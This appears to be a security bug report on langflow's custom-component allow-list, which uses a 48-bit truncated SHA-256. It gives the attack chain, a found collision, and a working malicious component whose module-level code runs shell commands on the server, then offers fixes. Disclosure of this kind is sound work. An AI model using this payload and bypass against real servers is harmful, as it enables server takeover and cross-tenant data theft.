Custom Component Allow-List Bypass → Authenticated RCE #13496

### Bug Description

## Summary

The custom component code-execution allow-list uses a **48-bit truncated SHA-256** hash (`sha256(code)[:12]`) as its sole security gate. When `allow_custom_components=false` (the multi-tenant hardening setting), this gate is the only defense preventing authenticated users from executing arbitrary code on the server.

A 48-bit second preimage is computationally feasible: we found a matching payload in **7.4 minutes** on commodity hardware (AMD EPYC 9654, 326 threads), producing malicious code that passes the gate and achieves server-side RCE via `exec()`.

## Affected Code

| File | Line | Function |
|------|------|----------|
| `src/lfx/src/lfx/utils/flow_validation.py` | 29 | `_compute_code_hash` |
| `src/lfx/src/lfx/custom/utils.py` | 67 | `_generate_code_hash` |

```python
# The vulnerable truncation (both files):
return hashlib.sha256(source_code.encode("utf-8")).hexdigest()[:12]  # 48-bit
```

## Root Cause

1. `_compute_code_hash(code)` truncates SHA-256 to 48 bits (12 hex chars)
2. The allow-list (`all_known_hashes`) stores these 48-bit values, computed from public built-in component source code
3. Gate check: `_compute_code_hash(submitted_code) in all_known_hashes`
4. **The submitted code that passes the check is the same code that gets `exec()`'d** (`validate.create_class` → `compile` → `exec`)
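The gate described in the steps above can be sketched as follows. This is a minimal illustration, not the project's code: the `gate_allows` helper and the one-entry allow-list are hypothetical stand-ins, and only the truncation expression is taken from the snippet quoted earlier.

```python
import hashlib

HASH_HEX_CHARS = 12  # 12 hex chars x 4 bits each = 48 bits


def compute_code_hash(source_code: str) -> str:
    """Truncated hash, mirroring the expression quoted in the report."""
    return hashlib.sha256(source_code.encode("utf-8")).hexdigest()[:HASH_HEX_CHARS]


# Hypothetical built-in component source; the report counts 352 real entries.
BUILTIN_SOURCE = "class TextInput:\n    pass\n"
all_known_hashes = {compute_code_hash(BUILTIN_SOURCE)}


def gate_allows(submitted_code: str) -> bool:
    """Hypothetical gate: only the 48-bit prefix of the digest is compared."""
    return compute_code_hash(submitted_code) in all_known_hashes


hash_bits = HASH_HEX_CHARS * 4
print(hash_bits, gate_allows(BUILTIN_SOURCE))
```

Because the check sees only 48 bits of the digest, any other source string whose digest shares that prefix is indistinguishable from the built-in.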

## Attack Chain

1. **Authenticate** as any user (any role) — `POST /api/v1/auto_login` or `/login`
2. **Fetch targets** — `GET /api/v1/all` returns all built-in component source code; compute their `sha256[:12]` (352 targets in current release)
3. **Brute-force** — Find a malicious code payload whose `sha256[:12]` matches any target (48-bit second-preimage against 352 targets: expected ~2^48/352 ≈ 8×10^11 hashes)
4. **Submit** — `POST /api/v1/custom_component` with `{"code": malicious_code}`
5. **Gate passes** — `code_hash_matches_any_template()` returns True
6. **RCE** — `Component(_code=code)` → `build_custom_component_template` → `eval_custom_component_code` → `validate.create_class` → `exec(compiled_code)` — module-level `ast.Assign` nodes execute immediately
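Step 3 can be illustrated at a deliberately reduced width. The sketch below uses a 16-bit truncation (4 hex characters) and eight made-up target strings so it finishes in well under a second. The payload is a harmless placeholder, and every name here is hypothetical rather than taken from `exploit.py` or `fast_bruteforce_v6.c`.

```python
import hashlib
from itertools import count
from typing import Set, Tuple

TOY_HEX_CHARS = 4  # 16 bits for the demo; the report's gate uses 12 hex chars


def truncated_hash(code: str, hex_chars: int = TOY_HEX_CHARS) -> str:
    return hashlib.sha256(code.encode("utf-8")).hexdigest()[:hex_chars]


def find_matching_variant(prefix: str, targets: Set[str]) -> Tuple[str, int]:
    """Append a trailing comment nonce until the truncated hash hits any target."""
    for attempts in count(1):
        candidate = f"{prefix}# nonce: {attempts}\n"
        if truncated_hash(candidate) in targets:
            return candidate, attempts
    raise AssertionError("unreachable: count() never ends")


# Hypothetical stand-ins for the built-in component sources.
targets = {truncated_hash(f"builtin_component_{i} = {i}\n") for i in range(8)}
candidate, attempts = find_matching_variant("harmless_placeholder = 1\n", targets)
print(attempts, truncated_hash(candidate))
```

With 16 bits and 8 targets the mean is roughly 2^16/8 = 8,192 attempts. The same loop against 48 bits and 352 targets gives the ~8×10^11 figure quoted in step 3.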

## Proof of Concept

### Collision Found

```
nonce:      qsbr1kk8haaaaaaa
sha256[:12]: faa14b3d6a18 (matches built-in component hash)
sha256:     faa14b3d6a182f9007d1a998d057e87ce01d1eb8262d7a75a8ba057edf0fd916
attempts:   1,366,933,483,198
time:       446.16 seconds (7.4 minutes)
rate:       3,063.77 MH/s
hardware:   AMD EPYC 9654 (PowerEdge R7625), 326 threads
method:     SHA-256 midstate precomputation + partitioned deterministic search
```
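The `method` line names two techniques that are easy to show in miniature. The sketch below is an assumption about what they mean, not a port of `fast_bruteforce_v6.c`: it hashes a fixed prefix once and resumes from that saved state for every nonce, and it splits the nonce space into non-overlapping strides per worker. The prefix and nonce values are made up. A C implementation would typically save the state at 64-byte block boundaries; `hashlib`'s `copy()` hides that detail.

```python
import hashlib

PREFIX = b"fixed_payload = 1\n# collision-nonce: "  # hypothetical fixed prefix

# Hash the constant prefix once; this saved state plays the role of the midstate.
midstate = hashlib.sha256(PREFIX)


def digest_with_nonce(nonce: bytes) -> str:
    """Resume from the saved state instead of rehashing the whole prefix."""
    h = midstate.copy()
    h.update(nonce)
    return h.hexdigest()


def partition(worker: int, workers: int, total: int) -> range:
    """Deterministic, non-overlapping slice of the nonce space for one worker."""
    return range(worker, total, workers)


nonce = b"0000000000000042"
direct = hashlib.sha256(PREFIX + nonce).hexdigest()
resumed = digest_with_nonce(nonce)
print(direct == resumed)
```

The saving grows with the length of the fixed prefix, since only the bytes after the saved state are processed per attempt.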

### Malicious Code (collision_code_48bit.py)

```python
import subprocess, os
from langflow.custom import Component
from langflow.io import MessageTextInput, Output
from langflow.schema.message import Message

_rce_setup = [os.makedirs("/tmp/evidence", exist_ok=True)]
_rce_marker = open("/tmp/evidence/pwned.txt", "w")
_rce_marker.write("CTF{48bit_sha256_truncation_RCE}" + chr(10))
_rce_marker.write("uid=" + str(os.getuid()) + " pid=" + str(os.getpid()) + chr(10))
_rce_marker.write("whoami=" + subprocess.check_output(["whoami"]).decode().strip() + chr(10))
_rce_marker.write("hostname=" + subprocess.check_output(["hostname"]).decode().strip() + chr(10))
_rce_marker.close()

class PwnedComponent(Component):
    display_name = "Text Input"
    description = "Get user text inputs."
    icon = "type"
    name = "TextInput"

    inputs = [
        MessageTextInput(name="input_value", display_name="Text"),
    ]
    outputs = [
        Output(display_name="Message", name="message", method="text_response"),
    ]

    def text_response(self) -> Message:
        return Message(text=open("/tmp/evidence/pwned.txt").read())
# collision-nonce: qsbr1kk8haaaaaaa
```

### Why Module-Level Code Executes

`validate.create_class` uses AST parsing. `prepare_global_scope` collects and `exec()`s these AST node types from the submitted code:
- `ast.Import` / `ast.ImportFrom`
- `ast.Assign` / `ast.AnnAssign` ← **our RCE payload uses this**
- `ast.ClassDef` / `ast.FunctionDef`

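The `_rce_setup = [...]` and `_rce_marker = open(...)` lines are `ast.Assign` nodes, so their right-hand sides run during `prepare_global_scope` → `exec(definitions)`. The follow-up `_rce_marker.write(...)` and `_rce_marker.close()` calls in the listing are bare expression statements (`ast.Expr`), which the list above does not include; the side effects that matter should therefore sit on the right-hand side of an assignment, as `_rce_setup` does.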
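The node-type distinction can be checked with the standard `ast` module alone. The sketch below filters a small module down to the node types listed above and executes the result. The filtering is an assumption modelled on the description of `prepare_global_scope`, not langflow's actual code, and the sample source is harmless.

```python
import ast

SOURCE = '''
import os
log = []
marker = log.append("assign ran")
log.append("expr ran")

class Demo:
    pass
'''

tree = ast.parse(SOURCE)
node_types = [type(node).__name__ for node in tree.body]
print(node_types)

# Keep only the node types the report lists, then exec them (assumed behaviour).
KEPT = (ast.Import, ast.ImportFrom, ast.Assign, ast.AnnAssign,
        ast.ClassDef, ast.FunctionDef)
kept_module = ast.Module(
    body=[node for node in tree.body if isinstance(node, KEPT)],
    type_ignores=[],
)
scope: dict = {}
exec(compile(kept_module, "<demo>", "exec"), scope)
print(scope["log"])
```

Under this filter the call on the right-hand side of an assignment runs, while the bare `log.append(...)` expression statement is dropped before `exec`.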

## Feasibility Analysis

| Hardware | Rate | Time (352 targets) |
|----------|------|-----|
| 1 CPU core (AMD EPYC) | ~10 MH/s | ~22 hours |
| 326 CPU threads | 3.06 GH/s | **7.4 minutes** (measured) |
| 1x RTX 4090 (estimated) | ~20 GH/s | ~40 seconds |
| 8x RTX 4090 (estimated) | ~160 GH/s | ~5 seconds |

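NIST's minimum security strength is 112 bits (SP 800-131A). The 48-bit truncation is **64 bits below that minimum**: a single-target second preimage costs about 2^48 hashes, and matching any of the 352 targets lowers the expected work to about 2^39.5, versus the 2^112 the standard requires.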
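The figures in this section can be reproduced with a few lines of arithmetic. The rates are the ones stated in the table (the GPU rows are the report's estimates), and the attempt count and elapsed time come from the "Collision Found" block; the variable names are ours.

```python
import math

HASH_BITS = 48
TARGETS = 352

expected_hashes = 2**HASH_BITS / TARGETS          # mean work for a multi-target match
effective_bits = HASH_BITS - math.log2(TARGETS)   # same quantity in bits

rates_hps = {
    "1 CPU core": 10e6,
    "326 threads": 3_063.77e6,
    "1x RTX 4090 (estimated)": 20e9,
    "8x RTX 4090 (estimated)": 160e9,
}
expected_seconds = {name: expected_hashes / rate for name, rate in rates_hps.items()}

# Figures from the "Collision Found" block.
attempts = 1_366_933_483_198
elapsed_s = 446.16
measured_rate_mhs = attempts / elapsed_s / 1e6
luck_factor = attempts / expected_hashes  # >1: the run needed more than the mean

for name, secs in expected_seconds.items():
    print(f"{name}: {secs:,.0f} s expected")
print(f"{measured_rate_mhs:,.2f} MH/s, {luck_factor:.2f}x the expected work")
```

The mean time at 3.06 GH/s comes out near 4.4 minutes; the measured 7.4-minute run needed about 1.7 times the expected number of hashes, which is unremarkable for a geometric search.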

## Conditions

- `LANGFLOW_ALLOW_CUSTOM_COMPONENTS=false` must be set (the multi-tenant hardening mode; default is `true` = no gate at all)
- Attacker needs an authenticated account (any role)
- Target hashes are public (derived from open-source built-in component code)

## Recommended Fix

### Immediate (stop the truncation):

```python
# Before (48-bit, breakable):
return hashlib.sha256(source_code.encode("utf-8")).hexdigest()[:12]

# After (256-bit, meets NIST 128-bit security strength):
return hashlib.sha256(source_code.encode("utf-8")).hexdigest()
```

Apply to both `flow_validation.py:29` and `custom/utils.py:67`.
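A small regression test can guard against the truncation being reintroduced. The sketch below is self-contained and uses a local `compute_code_hash` that mirrors the "After" line; in the real code base the test would import the two functions named above instead, and the test name is hypothetical.

```python
import hashlib


def compute_code_hash(source_code: str) -> str:
    """Full SHA-256 hex digest, as in the 'After' line above."""
    return hashlib.sha256(source_code.encode("utf-8")).hexdigest()


def test_hash_is_not_truncated() -> None:
    digest = compute_code_hash("print('hello')\n")
    # digest_size is in bytes; each byte is two hex characters (64 in total).
    assert len(digest) == hashlib.sha256().digest_size * 2
    # The value must still be a plain hex string.
    assert int(digest, 16) >= 0


test_hash_is_not_truncated()
```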

### Defense-in-depth (architectural):

1. **Don't exec client bytes** — When the gate passes, execute the **server's stored trusted copy** of the component, not the client-submitted code. This breaks the fundamental "checked bytes = exec'd bytes" equivalence.
2. **Sign the allow-list** — Use an HMAC with a server-side secret over `(component_type, code_hash)`, so offline precomputation is useless.
3. **Sandbox tenant code** — Execute components in an isolated container/VM regardless of whether they pass the allow-list.

## Files Provided

| File | Description |
|------|-------------|
| `collision_code_48bit.py` | The malicious code with verified 48-bit collision |
| `fast_bruteforce_v6.c` | Collision search tool (midstate + partitioned, C) |
| `target_hashes.txt` | 352 target hashes extracted from langflow |
| `code_prefix.txt` | Malicious template prefix |
| `exploit.py` | Full end-to-end exploit (recon → submit → verify) |
| `docker-compose.yml` | Reproducible target environment |


## Impact

An authenticated attacker (any role, any privilege level) can execute **arbitrary code on the langflow server process** by bypassing the custom component allow-list. Concrete impact:

- **Full server compromise**: The malicious code runs in the langflow server process with its full privilege — read/write access to all files, environment variables (including API keys, database credentials, secrets), and network connectivity.
- **Cross-tenant data breach**: In multi-tenant deployments (the exact scenario `allow_custom_components=false` is designed to protect), the attacker can access all tenants' flows, credentials, uploaded documents, and conversation history stored in the shared database.
- **Lateral movement**: The server process typically has access to internal networks, databases (PostgreSQL), and external API keys (OpenAI, etc.), enabling further compromise beyond langflow itself.
- **Supply chain risk**: The attacker can silently modify built-in component code or inject backdoors into flows belonging to other users, persisting access even after the initial vulnerability is patched.
- **Denial of service**: Arbitrary code execution trivially enables process termination, resource exhaustion, or data destruction.

### Reproduction

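Follow the Attack Chain and Proof of Concept sections above; `exploit.py` and `docker-compose.yml` (listed under Files Provided) automate the steps.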

### Expected behavior

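With `allow_custom_components=false`, submitted code that is not byte-identical to a built-in component should be rejected before it reaches `exec()`.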

### Who can help?

@italojohnny 

### Operating System

Ubuntu 22.04

### Langflow Version

1.9.6

### Python Version

3.10

### Screenshot

_No response_

### Flow File

_No response_
